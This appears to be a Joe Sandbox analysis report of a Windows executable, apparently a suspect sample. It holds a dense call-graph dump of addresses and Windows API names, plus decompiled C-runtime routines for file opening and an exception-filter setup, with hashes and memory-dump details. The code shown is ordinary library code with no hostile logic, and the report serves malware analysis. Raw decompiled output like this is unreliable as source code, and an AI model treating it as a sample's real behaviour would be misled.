9199->9200 9200->9194 9202 40af1f __wsopen_s 6 API calls 9200->9202 9201->9194 9201->9195 9209 4066e6 EnterCriticalSection 9201->9209 9210 4066fa LeaveCriticalSection 9201->9210 9204 407ccd 9202->9204 9211 4066e6 EnterCriticalSection 9204->9211 9212 409f86 LeaveCriticalSection 9206->9212 9208 4047aa 9208->9176 9208->9177 9209->9201 9210->9201 9211->9194 9212->9208 9213->9191 9216 404911 __FrameHandler3::FrameUnwindToState 9214->9216 9215 404917 9217 4064ea __fread_nolock 39 API calls 9215->9217 9216->9215 9219 40495a 9216->9219 9218 404932 9217->9218 9218->9152 9225 4066e6 EnterCriticalSection 9219->9225 9221 404966 9226 404a88 9221->9226 9223 40497c 9235 4049a5 9223->9235 9225->9221 9227 404a9b 9226->9227 9228 404aae 9226->9228 9227->9223 9238 4049af 9228->9238 9230 404b5f 9230->9223 9231 404ad1 9231->9230 9242 4083c6 9231->9242 9399 4066fa LeaveCriticalSection 9235->9399 9237 4049ad 9237->9218 9239 4049c0 9238->9239 9241 404a18 9238->9241 9239->9241 9251 4068d4 9239->9251 9241->9231 9243 4083df 9242->9243 9247 404aff 9242->9247 9243->9247 9279 4065ab 9243->9279 9245 4083fb 9286 40cfd9 9245->9286 9248 406914 9247->9248 9249 406833 __fread_nolock 41 API calls 9248->9249 9250 40692d 9249->9250 9250->9230 9252 4068e8 __fread_nolock 9251->9252 9257 406833 9252->9257 9254 4068fd 9255 4042bb __fread_nolock 39 API calls 9254->9255 9256 40690c 9255->9256 9256->9241 9263 40a3b3 9257->9263 9259 406845 9260 406861 SetFilePointerEx 9259->9260 9262 40684d __wsopen_s 9259->9262 9261 406879 GetLastError 9260->9261 9260->9262 9261->9262 9262->9254 9264 40a3c0 9263->9264 9266 40a3d5 9263->9266 9276 407b57 9264->9276 9268 407b57 __dosmaperr 14 API calls 9266->9268 9270 40a3fa 9266->9270 9271 40a405 9268->9271 9269 407b6a __dosmaperr 14 API calls 9273 40a3cd 9269->9273 9270->9259 9272 407b6a __dosmaperr 14 API calls 9271->9272 9274 40a40d 9272->9274 9273->9259 9275 406567 __fread_nolock 39 API calls 9274->9275 9275->9273 9277 406dc1 __dosmaperr 14 API calls 9276->9277 9278 407b5c 9277->9278 9278->9269 9280 4065b7 9279->9280 9281 4065cc 9279->9281 9282 407b6a __dosmaperr 14 API calls 9280->9282 9281->9245 9283 4065bc 9282->9283 9284 406567 __fread_nolock 39 API calls 9283->9284 9285 4065c7 9284->9285 9285->9245 9287 40cfe5 __FrameHandler3::FrameUnwindToState 9286->9287 9288 40d026 9287->9288 9290 40d06c 9287->9290 9296 40cfed 9287->9296 9289 4064ea __fread_nolock 39 API calls 9288->9289 9289->9296 9297 40a137 EnterCriticalSection 9290->9297 9292 40d072 9293 40d090 9292->9293 9298 40d0ea 9292->9298 9324 40d0e2 9293->9324 9296->9247 9297->9292 9299 40d112 9298->9299 9302 40d135 __wsopen_s 9298->9302 9300 40d116 9299->9300 9303 40d171 9299->9303 9301 4064ea __fread_nolock 39 API calls 9300->9301 9301->9302 9302->9293 9304 40d18f 9303->9304 9305 406914 __wsopen_s 41 API calls 9303->9305 9327 40cc2f 9304->9327 9305->9304 9308 40d1a7 9310 40d1d6 9308->9310 9311 40d1af 9308->9311 9309 40d1ee 9312 40d202 9309->9312 9313 40d257 WriteFile 9309->9313 9339 40c800 GetConsoleOutputCP 9310->9339 9311->9302 9334 40cbc7 9311->9334 9316 40d243 9312->9316 9317 40d20a 9312->9317 9313->9302 9315 40d279 GetLastError 9313->9315 9315->9302 9367 40ccac 9316->9367 9320 40d22f 9317->9320 9322 40d20f 9317->9322 9359 40ce70 9320->9359 9322->9302 9352 40cd87 9322->9352 9398 40a1ec LeaveCriticalSection 9324->9398 9326 40d0e8 9326->9296 9374 40bb62 9327->9374 9329 40cca5 9329->9308 9329->9309 9330 40cc41 9330->9329 9331 40cc6f 9330->9331 9383 404830 9330->9383 9331->9329 9333 40cc89 GetConsoleMode 9331->9333 9333->9329 9335 40cc1e 9334->9335 9338 40cbe9 9334->9338 9335->9302 9336 40e770 5 API calls __wsopen_s 9336->9338 9337 40cc20 GetLastError 9337->9335 9338->9335 9338->9336 9338->9337 9340 40c872 9339->9340 9349 40c879 __fread_nolock 9339->9349 9341 404830 __wsopen_s 39 API calls 9340->9341 9341->9349 9342 401be5 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 9343 40cbc0 9342->9343 9343->9302 9344 40b944 40 API calls __wsopen_s 9344->9349 9345 40cb2f 9345->9342 9346 40e089 5 API calls __wsopen_s 9346->9349 9347 409a30 __wsopen_s WideCharToMultiByte 9347->9349 9348 40caa8 WriteFile 9348->9349 9350 40cb9e GetLastError 9348->9350 9349->9344 9349->9345 9349->9346 9349->9347 9349->9348 9351 40cae6 WriteFile 9349->9351 9350->9345 9351->9349 9351->9350 9356 40cd96 __wsopen_s 9352->9356 9353 40ce55 9355 401be5 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 9353->9355 9354 40ce0b WriteFile 9354->9356 9357 40ce57 GetLastError 9354->9357 9358 40ce6e 9355->9358 9356->9353 9356->9354 9357->9353 9358->9302 9366 40ce7f __wsopen_s 9359->9366 9360 40cf87 9361 401be5 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 9360->9361 9362 40cfa0 9361->9362 9362->9302 9363 409a30 __wsopen_s WideCharToMultiByte 9363->9366 9364 40cf89 GetLastError 9364->9360 9365 40cf3e WriteFile 9365->9364 9365->9366 9366->9360 9366->9363 9366->9364 9366->9365 9372 40ccbb __wsopen_s 9367->9372 9368 40cd6c 9369 401be5 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 9368->9369 9370 40cd85 9369->9370 9370->9302 9371 40cd2b WriteFile 9371->9372 9373 40cd6e GetLastError 9371->9373 9372->9368 9372->9371 9373->9368 9375 40bb7c 9374->9375 9376 40bb6f 9374->9376 9378 40bb88 9375->9378 9379 407b6a __dosmaperr 14 API calls 9375->9379 9377 407b6a __dosmaperr 14 API calls 9376->9377 9380 40bb74 9377->9380 9378->9330 9381 40bba9 9379->9381 9380->9330 9382 406567 __fread_nolock 39 API calls 9381->9382 9382->9380 9384 404704 __fread_nolock 39 API calls 9383->9384 9385 404840 9384->9385 9390 40815e 9385->9390 9391 408175 9390->9391 9392 40485d 9390->9392 9391->9392 9393 40aadb __wsopen_s 39 API calls 9391->9393 9394 4081bc 9392->9394 9393->9392 9395 4081d3 9394->9395 9397 40486a 9394->9397 9396 40965e __wsopen_s 39 API calls 9395->9396 9395->9397 9396->9397 9397->9331 9398->9326 9399->9237 9401 40402c __FrameHandler3::FrameUnwindToState 9400->9401 9402 404033 9401->9402 9403 404054 9401->9403 9404 4064ea __fread_nolock 39 API calls 9402->9404 9411 4066e6 EnterCriticalSection 9403->9411 9410 40404c 9404->9410 9406 40405f 9412 4040a0 9406->9412 9410->9158 9411->9406 9418 4040d2 9412->9418 9414 40406e 9415 404096 9414->9415 9470 4066fa LeaveCriticalSection 9415->9470 9417 40409e 9417->9410 9419 4040e1 9418->9419 9420 404109 9418->9420 9422 4064ea __fread_nolock 39 API calls 9419->9422 9421 4065ab __fread_nolock 39 API calls 9420->9421 9423 404112 9421->9423 9431 4040fc __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 9422->9431 9432 4068b6 9423->9432 9426 4041bc 9435 4044c2 9426->9435 9429 4041d3 9429->9431 9447 4042f7 9429->9447 9431->9414 9454 40670e 9432->9454 9436 4044d1 __wsopen_s 9435->9436 9437 4065ab __fread_nolock 39 API calls 9436->9437 9439 4044ed __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 9437->9439 9438 401be5 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 9440 4041cb 9438->9440 9441 4068b6 43 API calls 9439->9441 9446 4044f9 9439->9446 9440->9431 9442 40454d 9441->9442 9443 40457f ReadFile 9442->9443 9442->9446 9444 4045a6 9443->9444 9443->9446 9445 4068b6 43 API calls 9444->9445 9445->9446 9446->9438 9448 4065ab __fread_nolock 39 API calls 9447->9448 9449 40430a 9448->9449 9450 4068b6 43 API calls 9449->9450 9453 404354 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 9449->9453 9451 4043b1 9450->9451 9452 4068b6 43 API calls 9451->9452 9451->9453 9452->9453 9453->9431 9456 40671a __FrameHandler3::FrameUnwindToState 9454->9456 9455 404130 9455->9426 9455->9429 9455->9431 9456->9455 9457 40675d 9456->9457 9459 4067a3 9456->9459 9458 4064ea __fread_nolock 39 API calls 9457->9458 9458->9455 9465 40a137 EnterCriticalSection 9459->9465 9461 4067a9 9462 4067ca 9461->9462 9463 406833 __fread_nolock 41 API calls 9461->9463 9466 40682b 9462->9466 9463->9462 9465->9461 9469 40a1ec LeaveCriticalSection 9466->9469 9468 406831 9468->9455 9469->9468 9470->9417 9472 404db0 __FrameHandler3::FrameUnwindToState 9471->9472 9473 404dc3 __fread_nolock 9472->9473 9474 404dfa 9472->9474 9483 4010a1 9472->9483 9476 407b6a __dosmaperr 14 API calls 9473->9476 9484 4066e6 EnterCriticalSection 9474->9484 9478 404ddd 9476->9478 9477 404e04 9485 404bae 9477->9485 9480 406567 __fread_nolock 39 API calls 9478->9480 9480->9483 9484->9477 9486 404bdd 9485->9486 9489 404bc0 __fread_nolock 9485->9489 9498 404e39 9486->9498 9487 404bcd 9488 407b6a __dosmaperr 14 API calls 9487->9488 9496 404bd2 9488->9496 9489->9486 9489->9487 9491 404c1e __fread_nolock 9489->9491 9490 406567 __fread_nolock 39 API calls 9490->9486 9491->9486 9492 404d49 __fread_nolock 9491->9492 9493 404e41 __fread_nolock 39 API calls 9491->9493 9494 4065ab __fread_nolock 39 API calls 9491->9494 9501 407550 9491->9501 9495 407b6a __dosmaperr 14 API calls 9492->9495 9493->9491 9494->9491 9495->9496 9496->9490 9596 4066fa LeaveCriticalSection 9498->9596 9500 404e3f 9500->9483 9502 407562 9501->9502 9503 40757a 9501->9503 9504 407b57 __dosmaperr 14 API calls 9502->9504 9505 4078bc 9503->9505 9510 4075bd 9503->9510 9506 407567 9504->9506 9507 407b57 __dosmaperr 14 API calls 9505->9507 9508 407b6a __dosmaperr 14 API calls 9506->9508 9509 4078c1 9507->9509 9511 40756f 9508->9511 9512 407b6a __dosmaperr 14 API calls 9509->9512 9510->9511 9513 4075c8 9510->9513 9517 4075f8 9510->9517 9511->9491 9514 4075d5 9512->9514 9515 407b57 __dosmaperr 14 API calls 9513->9515 9518 406567 __fread_nolock 39 API calls 9514->9518 9516 4075cd 9515->9516 9519 407b6a __dosmaperr 14 API calls 9516->9519 9520 407611 9517->9520 9521 40764c 9517->9521 9522 40761e 9517->9522 9518->9511 9519->9514 9520->9522 9556 40763a 9520->9556 9524 40a6a3 __fread_nolock 15 API calls 9521->9524 9523 407b57 __dosmaperr 14 API calls 9522->9523 9525 407623 9523->9525 9526 40765d 9524->9526 9527 407b6a __dosmaperr 14 API calls 9525->9527 9529 408694 __freea 14 API calls 9526->9529 9530 40762a 9527->9530 9528 40bb62 __fread_nolock 39 API calls 9531 407798 9528->9531 9532 407666 9529->9532 9533 406567 __fread_nolock 39 API calls 9530->9533 9534 40780c 9531->9534 9537 4077b1 GetConsoleMode 9531->9537 9535 408694 __freea 14 API calls 9532->9535 9563 407635 __fread_nolock 9533->9563 9536 407810 ReadFile 9534->9536 9538 40766d 9535->9538 9539 407884 GetLastError 9536->9539 9540 407828 9536->9540 9537->9534 9541 4077c2 9537->9541 9543 407692 9538->9543 9544 407677 9538->9544 9545 407891 9539->9545 9546 4077e8 9539->9546 9540->9539 9547 407801 9540->9547 9541->9536 9542 4077c8 ReadConsoleW 9541->9542 9542->9547 9548 4077e2 GetLastError 9542->9548 9552 4068d4 __fread_nolock 41 API calls 9543->9552 9550 407b6a __dosmaperr 14 API calls 9544->9550 9551 407b6a __dosmaperr 14 API calls 9545->9551 9546->9563 9566 407b10 9546->9566 9557 407864 9547->9557 9558 40784d 9547->9558 9547->9563 9548->9546 9549 408694 __freea 14 API calls 9549->9511 9554 40767c 9550->9554 9555 407896 9551->9555 9552->9556 9559 407b57 __dosmaperr 14 API calls 9554->9559 9560 407b57 __dosmaperr 14 API calls 9555->9560 9556->9528 9562 40787d 9557->9562 9557->9563 9571 407262 9558->9571 9559->9563 9560->9563 9584 4070a8 9562->9584 9563->9549 9567 407b57 __dosmaperr 14 API calls 9566->9567 9568 407b1b __dosmaperr 9567->9568 9569 407b6a __dosmaperr 14 API calls 9568->9569 9570 407b2e 9569->9570 9570->9563 9590 406f5b 9571->9590 9573 409976 __fread_nolock MultiByteToWideChar 9574 407376 9573->9574 9578 40737f GetLastError 9574->9578 9581 4072aa 9574->9581 9575 407304 9582 4072be 9575->9582 9583 4068d4 __fread_nolock 41 API calls 9575->9583 9576 4072f4 9579 407b6a __dosmaperr 14 API calls 9576->9579 9580 407b10 __dosmaperr 14 API calls 9578->9580 9579->9581 9580->9581 9581->9563 9582->9573 9583->9582 9585 4070e2 9584->9585 9586 407178 ReadFile 9585->9586 9587 407173 9585->9587 9586->9587 9588 407195 9586->9588 9587->9563 9588->9587 9589 4068d4 __fread_nolock 41 API calls 9588->9589 9589->9587 9591 406f8f 9590->9591 9592 407000 ReadFile 9591->9592 9593 406ffb 9591->9593 9592->9593 9594 407019 9592->9594 9593->9575 9593->9576 9593->9581 9593->9582 9594->9593 9595 4068d4 __fread_nolock 41 API calls 9594->9595 9595->9593 9596->9500 9598 405853 9597->9598 9606 405864 9597->9606 9608 4018b6 GetModuleHandleW 9598->9608 9602 401419 9602->8444 9615 4056d6 9606->9615 9609 4018c2 9608->9609 9609->9606 9610 405907 GetModuleHandleExW 9609->9610 9611 405946 GetProcAddress 9610->9611 9612 40595a 9610->9612 9611->9612 9613 405976 9612->9613 9614 40596d FreeLibrary 9612->9614 9613->9606 9614->9613 9616 4056e2 __FrameHandler3::FrameUnwindToState 9615->9616 9630 409f3e EnterCriticalSection 9616->9630 9618 4056ec 9631 40573e 9618->9631 9620 4056f9 9635 405717 9620->9635 9623 4058bd 9660 4058ee 9623->9660 9625 4058c7 9626 4058db 9625->9626 9627 4058cb GetCurrentProcess TerminateProcess 9625->9627 9628 405907 __CreateFrameInfo 3 API calls 9626->9628 9627->9626 9629 4058e3 ExitProcess 9628->9629 9630->9618 9633 40574a __FrameHandler3::FrameUnwindToState __CreateFrameInfo 9631->9633 9632 4057ae __CreateFrameInfo 9632->9620 9633->9632 9638 405f4c 9633->9638 9659 409f86 LeaveCriticalSection 9635->9659 9637 405705 9637->9602 9637->9623 9639 405f58 __EH_prolog3 9638->9639 9642 405ca4 9639->9642 9641 405f7f __CreateFrameInfo 9641->9632 9643 405cb0 __FrameHandler3::FrameUnwindToState 9642->9643 9650 409f3e EnterCriticalSection 9643->9650 9645 405cbe 9651 405e5c 9645->9651 9650->9645 9652 405ccb 9651->9652 9653 405e7b 9651->9653 9655 405cf3 9652->9655 9653->9652 9654 408694 __freea 14 API calls 9653->9654 9654->9652 9658 409f86 LeaveCriticalSection 9655->9658 9657 405cdc 9657->9641 9658->9657 9659->9637 9663 409fc2 9660->9663 9662 4058f3 __CreateFrameInfo 9662->9625 9664 409fd1 __CreateFrameInfo 9663->9664 9665 409fde 9664->9665 9667 40ad64 9664->9667 9665->9662 9668 40acdf __dosmaperr 5 API calls 9667->9668 9669 40ad80 9668->9669 9669->9665 10953 406b37 10954 406b42 10953->10954 10955 406b52 10953->10955 10959 406b58 10954->10959 10958 408694 __freea 14 API calls 10958->10955 10960 406b73 10959->10960 10961 406b6d 10959->10961 10962 408694 __freea 14 API calls 10960->10962 10963 408694 __freea 14 API calls 10961->10963 10964 406b7f 10962->10964 10963->10960 10965 408694 __freea 14 API calls 10964->10965 10966 406b8a 10965->10966 10967 408694 __freea 14 API calls 10966->10967 10968 406b95 10967->10968 10969 408694 __freea 14 API calls 10968->10969 10970 406ba0 10969->10970 10971 408694 __freea 14 API calls 10970->10971 10972 406bab 10971->10972 10973 408694 __freea 14 API calls 10972->10973 10974 406bb6 10973->10974 10975 408694 __freea 14 API calls 10974->10975 10976 406bc1 10975->10976 10977 408694 __freea 14 API calls 10976->10977 10978 406bcc 10977->10978 10979 408694 __freea 14 API calls 10978->10979 10980 406bda 10979->10980 10985 406984 10980->10985 10986 406990 __FrameHandler3::FrameUnwindToState 10985->10986 11001 409f3e EnterCriticalSection 10986->11001 10989 40699a 10991 408694 __freea 14 API calls 10989->10991 10992 4069c4 10989->10992 10991->10992 11002 4069e3 10992->11002 10993 4069ef 10994 4069fb __FrameHandler3::FrameUnwindToState 10993->10994 11006 409f3e EnterCriticalSection 10994->11006 10996 406a05 10997 406c25 __dosmaperr 14 API calls 10996->10997 10998 406a18 10997->10998 11007 406a38 10998->11007 11001->10989 11005 409f86 LeaveCriticalSection 11002->11005 11004 4069d1 11004->10993 11005->11004 11006->10996 11010 409f86 LeaveCriticalSection 11007->11010 11009 406a26 11009->10958 11010->11009

                                                              Executed Functions

                                                              Function 004018F8 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 332 4018f8-401903 SetUnhandledExceptionFilter
                                                              C-Code - Quality: 100%
                                                              			E004018F8() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401904); // executed
				return _t1;
			}




                                                              0x004018fd
                                                              0x00401903

                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNELBASE(Function_00001904,00401293), ref: 004018FD
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: b755dcbb7af07ac9c81e13e1733f710bb07da44beaed3427e740af2affbf1b5f
                                                              • Instruction ID: 3c76379c11a141df46b3ea9b27e7dd020c20bdbff8068edec9eb88929e08c5b5
                                                              • Opcode Fuzzy Hash: b755dcbb7af07ac9c81e13e1733f710bb07da44beaed3427e740af2affbf1b5f
                                                              • Instruction Fuzzy Hash:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040C3B7 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              C-Code - Quality: 38%
                                                              			E0040C3B7(void* __ecx, void* __eflags, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				intOrPtr _v40;
				signed int _v48;
				void _v52;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				void* _t122;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t162;
				intOrPtr _t178;
				void* _t188;
				signed int* _t189;
				signed int _t191;
				signed int _t196;
				signed int _t202;
				signed int _t205;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t224;
				signed int _t226;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed char _t241;
				signed int _t242;
				intOrPtr _t246;
				void* _t249;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t268;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;

				_t263 = E0040C105(__ecx,  &_v76, _a16, _a20, _a24);
				_t191 = 6;
				memcpy( &_v52, _t263, _t191 << 2);
				_t275 = _t273 + 0x1c;
				_t249 = _t263 + _t191 + _t191;
				_t264 = _t263 | 0xffffffff;
				if(_v40 != _t264) {
					_t114 = E0040A20F(_t188, _t249, _t264, __eflags);
					_t189 = _a8;
					 *_t189 = _t114;
					__eflags = _t114 - _t264;
					if(_t114 != _t264) {
						_v24 = _v24 & 0x00000000;
						_v28 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v20 =  !(_a16 >> 7) & 1;
						_push( &_v28);
						_push(_a12);
						memcpy(_t276,  &_v52, 1 << 2);
						_t196 = 0;
						_t122 = E0040C070(); // executed
						_t253 = _t122;
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253); // executed
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v52;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v52 | 0x00000040;
								}
								_v5 = _t124;
								E0040A15A(_t196,  *_t189, _t253);
								_t241 = _v5 | 0x00000001;
								_v16 = _t241;
								_v52 = _t241;
								 *( *((intOrPtr*)(0x418ec0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) = _t241;
								_t202 =  *_t189;
								_t204 = (_t202 & 0x0000003f) * 0x38;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x418ec0 + (_t202 >> 6) * 4)) + 0x29 + (_t202 & 0x0000003f) * 0x38)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L22:
									_v5 = 0;
									_push( &_v5);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t205 = 6;
									_push( *_t189);
									memcpy(_t279,  &_v52, _t205 << 2);
									_t134 = E0040BE1A(_t189,  &_v52 + _t205 + _t205,  &_v52);
									_t242 =  *_t189;
									_t267 = _t134;
									_t281 = _t279 + 0x30;
									__eflags = _t267;
									if(_t267 == 0) {
										 *((char*)( *((intOrPtr*)(0x418ec0 + (_t242 >> 6) * 4)) + 0x29 + (_t242 & 0x0000003f) * 0x38)) = _v5;
										 *( *((intOrPtr*)(0x418ec0 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x418ec0 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x418ec0 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38)) & 0x00000001;
										__eflags = _v16 & 0x00000048;
										if((_v16 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t224 =  *_t189;
												_t226 = (_t224 & 0x0000003f) * 0x38;
												_t162 =  *((intOrPtr*)(0x418ec0 + (_t224 >> 6) * 4));
												_t87 = _t162 + _t226 + 0x28;
												 *_t87 =  *(_t162 + _t226 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t268 = _v48;
										__eflags = (_t268 & 0xc0000000) - 0xc0000000;
										if((_t268 & 0xc0000000) != 0xc0000000) {
											L32:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L32;
											}
											CloseHandle(_v12);
											_v48 = _t268 & 0x7fffffff;
											_t214 = 6;
											_push( &_v28);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v52, _t214 << 2);
											_t246 = E0040C070();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t216 =  *_t189;
												_t218 = (_t216 & 0x0000003f) * 0x38;
												__eflags = _t218;
												 *((intOrPtr*)( *((intOrPtr*)(0x418ec0 + (_t216 >> 6) * 4)) + _t218 + 0x18)) = _t246;
												goto L32;
											}
											E00407B10(GetLastError());
											 *( *((intOrPtr*)(0x418ec0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x418ec0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
											E0040A322( *_t189);
											L10:
											goto L2;
										}
									}
									_push(_t242);
									goto L21;
								} else {
									_t267 = E0040C27F(_t204,  *_t189);
									__eflags = _t267;
									if(_t267 == 0) {
										goto L22;
									}
									_push( *_t189);
									L21:
									E0040E6A0();
									return _t267;
								}
							}
							_t271 = GetLastError();
							E00407B10(_t271);
							 *( *((intOrPtr*)(0x418ec0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x418ec0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(_t271 == 0) {
								 *((intOrPtr*)(E00407B6A())) = 0xd;
							}
							goto L2;
						}
						_t233 = _v48;
						__eflags = (_t233 & 0xc0000000) - 0xc0000000;
						if((_t233 & 0xc0000000) != 0xc0000000) {
							L9:
							_t234 =  *_t189;
							_t236 = (_t234 & 0x0000003f) * 0x38;
							_t178 =  *((intOrPtr*)(0x418ec0 + (_t234 >> 6) * 4));
							_t33 = _t178 + _t236 + 0x28;
							 *_t33 =  *(_t178 + _t236 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E00407B10(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v48 = _t233 & 0x7fffffff;
						_t238 = 6;
						_push( &_v28);
						_push(_a12);
						memcpy(_t285,  &_v52, _t238 << 2);
						_t196 = 0;
						_t253 = E0040C070();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E00407B57()) =  *_t184 & 0x00000000;
						 *_t189 = _t264;
						 *((intOrPtr*)(E00407B6A())) = 0x18;
						goto L2;
					}
				} else {
					 *(E00407B57()) =  *_t186 & 0x00000000;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E00407B6A()));
				}
			}
























































                                                              0x0040c3da
                                                              0x0040c3de
                                                              0x0040c3df
                                                              0x0040c3df
                                                              0x0040c3df
                                                              0x0040c3e1
                                                              0x0040c3e7
                                                              0x0040c402
                                                              0x0040c407
                                                              0x0040c40a
                                                              0x0040c40c
                                                              0x0040c40e
                                                              0x0040c42d
                                                              0x0040c434
                                                              0x0040c43b
                                                              0x0040c43e
                                                              0x0040c44a
                                                              0x0040c44d
                                                              0x0040c455
                                                              0x0040c456
                                                              0x0040c459
                                                              0x0040c459
                                                              0x0040c45b
                                                              0x0040c460
                                                              0x0040c462
                                                              0x0040c465
                                                              0x0040c46d
                                                              0x0040c470
                                                              0x0040c4dd
                                                              0x0040c4de
                                                              0x0040c4e4
                                                              0x0040c4e6
                                                              0x0040c52f
                                                              0x0040c532
                                                              0x0040c53b
                                                              0x0040c53e
                                                              0x0040c541
                                                              0x0040c543
                                                              0x0040c543
                                                              0x0040c543
                                                              0x0040c534
                                                              0x0040c537
                                                              0x0040c537
                                                              0x0040c548
                                                              0x0040c54b
                                                              0x0040c557
                                                              0x0040c55c
                                                              0x0040c568
                                                              0x0040c572
                                                              0x0040c576
                                                              0x0040c580
                                                              0x0040c583
                                                              0x0040c58e
                                                              0x0040c593
                                                              0x0040c5b2
                                                              0x0040c5b5
                                                              0x0040c5b9
                                                              0x0040c5ba
                                                              0x0040c5c0
                                                              0x0040c5c5
                                                              0x0040c5c8
                                                              0x0040c5ca
                                                              0x0040c5cc
                                                              0x0040c5d1
                                                              0x0040c5d3
                                                              0x0040c5d5
                                                              0x0040c5d8
                                                              0x0040c5da
                                                              0x0040c5f4
                                                              0x0040c618
                                                              0x0040c61c
                                                              0x0040c620
                                                              0x0040c622
                                                              0x0040c626
                                                              0x0040c628
                                                              0x0040c632
                                                              0x0040c635
                                                              0x0040c63c
                                                              0x0040c63c
                                                              0x0040c63c
                                                              0x0040c63c
                                                              0x0040c626
                                                              0x0040c641
                                                              0x0040c64d
                                                              0x0040c64f
                                                              0x0040c6da
                                                              0x0040c6da
                                                              0x00000000
                                                              0x0040c655
                                                              0x0040c655
                                                              0x0040c659
                                                              0x00000000
                                                              0x00000000
                                                              0x0040c65e
                                                              0x0040c670
                                                              0x0040c678
                                                              0x0040c67b
                                                              0x0040c67c
                                                              0x0040c67f
                                                              0x0040c686
                                                              0x0040c68b
                                                              0x0040c68e
                                                              0x0040c6c2
                                                              0x0040c6cc
                                                              0x0040c6cc
                                                              0x0040c6d6
                                                              0x00000000
                                                              0x0040c6d6
                                                              0x0040c697
                                                              0x0040c6b0
                                                              0x0040c6b7
                                                              0x0040c4d7
                                                              0x00000000
                                                              0x0040c4d7
                                                              0x0040c64f
                                                              0x0040c5dc
                                                              0x00000000
                                                              0x0040c595
                                                              0x0040c59c
                                                              0x0040c59f
                                                              0x0040c5a1
                                                              0x00000000
                                                              0x00000000
                                                              0x0040c5a3
                                                              0x0040c5a5
                                                              0x0040c5a5
                                                              0x00000000
